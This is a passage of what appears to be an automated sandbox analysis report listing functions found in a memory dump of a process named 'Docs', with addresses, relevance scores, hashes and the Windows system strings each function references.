                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: e468e5e84bf198e212ac96c2ff69509ae08fd57aa65c09cd774ecdb172874588
                                                              • Instruction ID: 65fab12d54d92ce3846a06434e626d4d650bb68de38b74e0fc7d0bbb1b624063
                                                              • Opcode Fuzzy Hash: e468e5e84bf198e212ac96c2ff69509ae08fd57aa65c09cd774ecdb172874588
                                                              • Instruction Fuzzy Hash: 58E19171E802199FEB26CF9DCD94BAEBBB9BF48350F50442AE901EB381D7749941CB50
                                                              Function 0166A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: c34e93c28dd7446cfdc7954f0ed0c26b322c9d1f2ac0511681b8124322370655
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 0EC1BE312043429BE724CF68CC41B6BBBE9AFD4318F084A2DF696EB291D775D905CB91
                                                              Function 0161E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 758d896da85da9fde24489c62da70637f9f1ff2f8202fb590a772a2890ef2982
                                                              • Instruction ID: 2444766cc0fff04f8b78dd86111f67850dad79e257980ede947b767793315bf2
                                                              • Opcode Fuzzy Hash: 758d896da85da9fde24489c62da70637f9f1ff2f8202fb590a772a2890ef2982
                                                              • Instruction Fuzzy Hash: 48616D71E006099FEB15DFA8CC80BADBBB5FB48700F19446EEA49EB255D732E941CB50
                                                              Function 016443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: e2816eb86be2d7bf3cde7814991aba70da521b365de9f7ecc9212e6d40eaaafb
                                                              • Instruction ID: 2fbea7d755f02d9904bf2bf9186370783a22a956c1b2c082d8c3f50aba343a57
                                                              • Opcode Fuzzy Hash: e2816eb86be2d7bf3cde7814991aba70da521b365de9f7ecc9212e6d40eaaafb
                                                              • Instruction Fuzzy Hash: B2510771E0021EAFDF15DFA9CC85BEEBBBCFB44654F100529E615BB290DB7099058BA0
                                                              Function 015A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015A063D
                                                              • kLsE, xrefs: 015A0540
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 1a6503ce8631f4e391d74a35b00973b76fa4d4d409ab8679a9d41fd57058375d
                                                              • Instruction ID: ded9aa301f4ad4ecef74ea096550d3d4919d8c7de61d1a78175052092aa785fd
                                                              • Opcode Fuzzy Hash: 1a6503ce8631f4e391d74a35b00973b76fa4d4d409ab8679a9d41fd57058375d
                                                              • Instruction Fuzzy Hash: D4519F715647428FD724EF68C5406ABBBE4BF85304F50483EE6DA8B281E770E545CB92
                                                              Function 015AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 015AA309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 015AA2FB
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: 4343daf7f0991d8acba20368a6ebb35d9e6fb51e68ff39c39b73ccade2208d11
                                                              • Instruction ID: c2caeaa774fedf8cb83946709b0add43b7f7217a057de71f32ea18ce461500a0
                                                              • Opcode Fuzzy Hash: 4343daf7f0991d8acba20368a6ebb35d9e6fb51e68ff39c39b73ccade2208d11
                                                              • Instruction Fuzzy Hash: EC418B30A44A55DBEB168F69D894B6EBBF4FF84704F1444AAE900DF391E3B5D900CB50
                                                              Function 016207C3 Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: z=c_$z=c_(
                                                              • API String ID: 0-964650894
                                                              • Opcode ID: 20e3840ec191f18d8d0086afffad8d1964db5b39628e767dc553c891dc46c69f
                                                              • Instruction ID: 95b74bae83b70e5d9454b77833cddfb7e32ffb6f23ebe7cbd56c1c99e43270ae
                                                              • Opcode Fuzzy Hash: 20e3840ec191f18d8d0086afffad8d1964db5b39628e767dc553c891dc46c69f
                                                              • Instruction Fuzzy Hash: 15418C72904711AFD720DF29CC45B9BBBE8FF88614F004A2EF998DB250D7709915CB92
                                                              Function 015DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 741652cc824a68d61b2f8340d5eb8a2ef43d074ce76d13def1e3fee5bc865aff
                                                              • Instruction ID: 6606729101c10bccacbe3d585eee9480237a754ff2292f0eda8a2ed841cba79a
                                                              • Opcode Fuzzy Hash: 741652cc824a68d61b2f8340d5eb8a2ef43d074ce76d13def1e3fee5bc865aff
                                                              • Instruction Fuzzy Hash: 3E01ADB2654704EFE321DF28CD46B2677E8F784715F048939A648CB190E3B4D804CB46
                                                              Function 015AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: 1d293f7b7b3a004418fa7ca700a6908ed37ba307bee72ce042f17f2ca8909900
                                                              • Instruction ID: 558a6c79bad7980246e81e211297aa363e869ce17cc3d75845748bd4e49872ca
                                                              • Opcode Fuzzy Hash: 1d293f7b7b3a004418fa7ca700a6908ed37ba307bee72ce042f17f2ca8909900
                                                              • Instruction Fuzzy Hash: 4A827B75E802198FEB25DFA9C880BEDBBB1BF48310F94816AE919AF750D7709941CF50
                                                              Function 01626420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 30d35625a6fd2a700ad5db7dbe5b7ac22d0f32ea6a2d68c9683d4bee11e4e0a4
                                                              • Instruction ID: 85d8b0d30e63840847da8a1a3857ea34238e4e8d072fe1126b72db23fe22a4dd
                                                              • Opcode Fuzzy Hash: 30d35625a6fd2a700ad5db7dbe5b7ac22d0f32ea6a2d68c9683d4bee11e4e0a4
                                                              • Instruction Fuzzy Hash: C091407190062AAFEB21DF95CD85FAE7BB8FF54B50F104059EA00BB290D774A900CF61
                                                              Function 0164E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 46031242494911736095bc26928249b190f6c1d02425a2ac905e2efd2497d3e2
                                                              • Instruction ID: 694c04f4b7fe3ac5370d6d010109bd53fe289c45ac3294d27a6d3709df2af9df
                                                              • Opcode Fuzzy Hash: 46031242494911736095bc26928249b190f6c1d02425a2ac905e2efd2497d3e2
                                                              • Instruction Fuzzy Hash: 74915F31900606AFDB27ABA5DC84FAFBBB9FF85740F100069F505AB250D77A9902CB50
                                                              Function 015DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalTags
                                                              • API String ID: 0-1106856819
                                                              • Opcode ID: 5fde3f0170a0f0b2729d4e903b47a42350c8428d86ff5bda6b5e27bb610eb2a4
                                                              • Instruction ID: d96a9fd865ec82e7dccef02c10ca1c6f2a44451b39bd48f5bd25546c250a9d3d
                                                              • Opcode Fuzzy Hash: 5fde3f0170a0f0b2729d4e903b47a42350c8428d86ff5bda6b5e27bb610eb2a4
                                                              • Instruction Fuzzy Hash: 49717379E0021ACFDF64CF9CD9906ADBBB1BF88710F18812EE905AB345E7719941CB60
                                                              Function 01644978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .mui
                                                              • API String ID: 0-1199573805
                                                              • Opcode ID: 1b818a0cab7b849155609b052ea03c0b084826d4a05c20feb3db4297eb315dff
                                                              • Instruction ID: 7586acad639525a0c288a78f15760c4623584de063d4bf01cb15bcea8a736313
                                                              • Opcode Fuzzy Hash: 1b818a0cab7b849155609b052ea03c0b084826d4a05c20feb3db4297eb315dff
                                                              • Instruction Fuzzy Hash: BA519172D0022A9BDF14DF99DC42BAEBBB4BF44A54F05416AEE11BB344DB349801CBA4
                                                              Function 015BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: EXT-
                                                              • API String ID: 0-1948896318
                                                              • Opcode ID: 15579acd4ca8d6d109aa5fe942dc826841e1a6d67070cc78d211aba27842064e
                                                              • Instruction ID: f48e0bc769e3e2d0d0985378591c1ec5a78dbf5df06e77511a0d882bd9f8d78e
                                                              • Opcode Fuzzy Hash: 15579acd4ca8d6d109aa5fe942dc826841e1a6d67070cc78d211aba27842064e
                                                              • Instruction Fuzzy Hash: F3416F72508352ABD711DA69D882BEFBBE8FF88614F48092DF584EF180E674D9048796
                                                              Function 0161C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryHash
                                                              • API String ID: 0-2202222882
                                                              • Opcode ID: 89ada1fa60a23f3cdd0eca47bfc3d3e988116a86670a5f826b52a4b5d08b1cb6
                                                              • Instruction ID: 54987069c2cebc73b12ff7b50b5fc72ac92578f0d67d6dcc2776586a73436b24
                                                              • Opcode Fuzzy Hash: 89ada1fa60a23f3cdd0eca47bfc3d3e988116a86670a5f826b52a4b5d08b1cb6
                                                              • Instruction Fuzzy Hash: D94163B1D4062EABDB21DA50CC84FDEBB7CAB44714F0545E5EB08AB144DB709E898FA4
                                                              Function 01636B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 89dfece819375e8fa7d1faf078b8d49ab8d0fe9a5c6b3c2ac0ca7fdd4a4751e6
                                                              • Instruction ID: f5d89c837c50bded04e470a6207c9656701ad202ba5d931b1fa1f997fcdeb1c7
                                                              • Opcode Fuzzy Hash: 89dfece819375e8fa7d1faf078b8d49ab8d0fe9a5c6b3c2ac0ca7fdd4a4751e6
                                                              • Instruction Fuzzy Hash: FC31F631E00719ABEB26DF69CC54BEE7BB8EF85704F144068EA41AF282D775DA05CB50
                                                              Function 0161CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: BinaryName
                                                              • API String ID: 0-215506332
                                                              • Opcode ID: a63a782797a08a2568e90e587d0fa8421fda5e010e0f4ec2fd3e7b2e0a09c53d
                                                              • Instruction ID: a8ea60e4f82137144c5ebe0137ee92dd75ed3522d297841a9e38a8311f1bb4ca
                                                              • Opcode Fuzzy Hash: a63a782797a08a2568e90e587d0fa8421fda5e010e0f4ec2fd3e7b2e0a09c53d
                                                              • Instruction Fuzzy Hash: 56310536D4051AAFEB16DA59CC55E6FBBB4FF80710F054169E901EB254D730AE00D7E0
                                                              Function 0162892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0162895E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                              • API String ID: 0-702105204
                                                              • Opcode ID: 66edc3c43d79db8d7f3853d1d28b68cb11c579c72ceb4580950730a7ce4572ca
                                                              • Instruction ID: db245512bb15459ced16f101e9be746ed1984a528a31e767f644c28e4d48b7ce
                                                              • Opcode Fuzzy Hash: 66edc3c43d79db8d7f3853d1d28b68cb11c579c72ceb4580950730a7ce4572ca
                                                              • Instruction Fuzzy Hash: 8301F732B10A329FEB256F5E9C84B6A7BADFFC1694B04105DF64217651CB207841CF97
                                                              Function 01642000 Relevance: .8, Instructions: 757COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3365065bce0caaca77d22428606c8d37830a0938a0be52c2c52b90c91bf23b6
                                                              • Instruction ID: 3750a3a6de343fd1f491c12af13a435c73a9703366d39e1fbced6e2ddae237c0
                                                              • Opcode Fuzzy Hash: b3365065bce0caaca77d22428606c8d37830a0938a0be52c2c52b90c91bf23b6
                                                              • Instruction Fuzzy Hash: 5F429D756083428FE725CF68DCA0A6FBBE5BF88700F29492DFA8297250D771D845CB52
                                                              Function 01638158 Relevance: .6, Instructions: 617COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51166b39eb66b2bb94aaf2a54c118daba1ba342ccb122ad610c8bfadcc1caf7f
                                                              • Instruction ID: 51fdef1d00592a2a0234e53a90928ff38181f9a42ac970fc333344ad85a7829e
                                                              • Opcode Fuzzy Hash: 51166b39eb66b2bb94aaf2a54c118daba1ba342ccb122ad610c8bfadcc1caf7f
                                                              • Instruction Fuzzy Hash: BE423A75A102198FEB25CF69CC81BEDBBF9BF88300F158199E949AB342D7349985CF50
                                                              Function 015B2840 Relevance: .6, Instructions: 605COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf9c8b902f00c84761796dbae1661add7181887ae2238783e4656a436456f6fe
                                                              • Instruction ID: f12c834263e953324ef3aa4bc7c4f28cca6b41e1bde3adc7cfd8d04c971d69ae
                                                              • Opcode Fuzzy Hash: bf9c8b902f00c84761796dbae1661add7181887ae2238783e4656a436456f6fe
                                                              • Instruction Fuzzy Hash: 4832BB70A007568BDB2ACF69CC447BEBBF2BF84304F24451DD58A9B385D735A962CB60
                                                              Function 0164A118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a475f0ee403e7f5bd2bdb146303487afb6a4963a239fefdee607730a5e6ec6e0
                                                              • Instruction ID: 67358a71aa5cfc50d960f23bd21620aba5246f617c223339e3676a67a988d903
                                                              • Opcode Fuzzy Hash: a475f0ee403e7f5bd2bdb146303487afb6a4963a239fefdee607730a5e6ec6e0
                                                              • Instruction Fuzzy Hash: 4D22EF74284661ABEB25CFADC890376BBF1AF44300F08845DE9878F786E335E452DB60
                                                              Function 015A6A50 Relevance: .5, Instructions: 548COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b9cfb3395c8def213a255535cd3781d3b71469b6c693e6fea23aa23a4d5216f
                                                              • Instruction ID: 2ce6ea69956b1a30838ff2d2f6bb4e642a501a0713cf19ed04e62c7c0b7d1d75
                                                              • Opcode Fuzzy Hash: 7b9cfb3395c8def213a255535cd3781d3b71469b6c693e6fea23aa23a4d5216f
                                                              • Instruction Fuzzy Hash: C732A271A01215CFDB29CF68C880BAEBBF1FF48310F588569E956AB791D774E841CB90
                                                              Function 015C4A35 Relevance: .4, Instructions: 423COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction ID: 04aa80ec245e5a48b419f1b47d053e5279a78fe218fb192885a4aa5e6c9825cf
                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                              • Instruction Fuzzy Hash: 1DF15C74E0020A9FDB19DFD9C990AAEBBF5BF48B14F05852DE905AB350E774E841CB60
                                                              Function 0163892B Relevance: .4, Instructions: 386COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f6edeb22f17ddc0ba366442da5dfb509eae79b28b98052b4855795192c78cfa
                                                              • Instruction ID: 59baa22e5fe114c5858c3fe91a6f52b879415ef4c62400008b22d7159702b47d
                                                              • Opcode Fuzzy Hash: 5f6edeb22f17ddc0ba366442da5dfb509eae79b28b98052b4855795192c78cfa
                                                              • Instruction Fuzzy Hash: A4D1C371E0060A9BDF19CF69CC41AFEB7F9BFC8304F188269E956A7241D735E9068B50
                                                              Function 015A65D0 Relevance: .4, Instructions: 383COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b8c7afc597a0c1681c8b965eae4ef9f5c26de58bb6a2bfbb722d2d4d928ee4c
                                                              • Instruction ID: 4ae723b4600eb80c42b9789aa0c2b432fc2c67e8ee9ba3667a555e5ef75eb5f3
                                                              • Opcode Fuzzy Hash: 3b8c7afc597a0c1681c8b965eae4ef9f5c26de58bb6a2bfbb722d2d4d928ee4c
                                                              • Instruction Fuzzy Hash: 87E19071608342CFC715CF28C490A6EBBE0FF89314F59896DE9998B351EB31E905CB92
                                                              Function 01598397 Relevance: .4, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cdf1cbf640fccb705a23e72c9a1e34485ed565e2fd806c1d707e1bfb13c036ba
                                                              • Instruction ID: c591dbc82ac292b584b87bd24bf82a9360d76153d2fad65c6b433c5d01c7beda
                                                              • Opcode Fuzzy Hash: cdf1cbf640fccb705a23e72c9a1e34485ed565e2fd806c1d707e1bfb13c036ba
                                                              • Instruction Fuzzy Hash: 47D1DE71A0020BDBDF14CF68C880ABEB7E5BF95204F14862DEA16DF280E735E954CB61
                                                              Function 01628243 Relevance: .3, Instructions: 322COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction ID: 303b1f9696d4022fb4797883a9fe1f8656460d39850efd7e69ec850dcbc59ba0
                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                              • Instruction Fuzzy Hash: 36B17174A00A15AFDB24DB98CD44AABBBFEBF85304F14845DEA42A7790DB34E905CF50
                                                              Function 015B0535 Relevance: .3, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: 8ae6b1b035d264c95dddbbe2fbaf068cfa0fbb979348ed84a66b91da4e797071
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 4FB19031604646AFDB26DB68C894BBFBBF6BF84200F144599E6529B3D1DB30ED41CB90
                                                              Function 015A83C0 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c4ac2b38e0326a8bd9b5f0c3f5569ed978e0d63e175cd198613bacaea7958369
                                                              • Instruction ID: cccbff339eaa7d5fddeff6af6cd7f5bf3287b3eaf0d2cf47b14c9a2a0fa61bd0
                                                              • Opcode Fuzzy Hash: c4ac2b38e0326a8bd9b5f0c3f5569ed978e0d63e175cd198613bacaea7958369
                                                              • Instruction Fuzzy Hash: DDC146746083419FE764CF19C884BAFB7E5BF88304F44496DE9898B391E774E908CB92
                                                              Function 0159C427 Relevance: .3, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 010e4bdbd7ba6aa786bf9ce590479f8e526545d72041e91868eecb7521532b64
                                                              • Instruction ID: 2bdd8018e7abf6220ecc6c94c5f07c7b5456eb770966fd2b21d54544f8f6f0ec
                                                              • Opcode Fuzzy Hash: 010e4bdbd7ba6aa786bf9ce590479f8e526545d72041e91868eecb7521532b64
                                                              • Instruction Fuzzy Hash: AEB15170A002668BDB64DF58C890BADB7F5FF84700F0485E9D54AEB281EB74DD85CB21
                                                              Function 015CE5E7 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
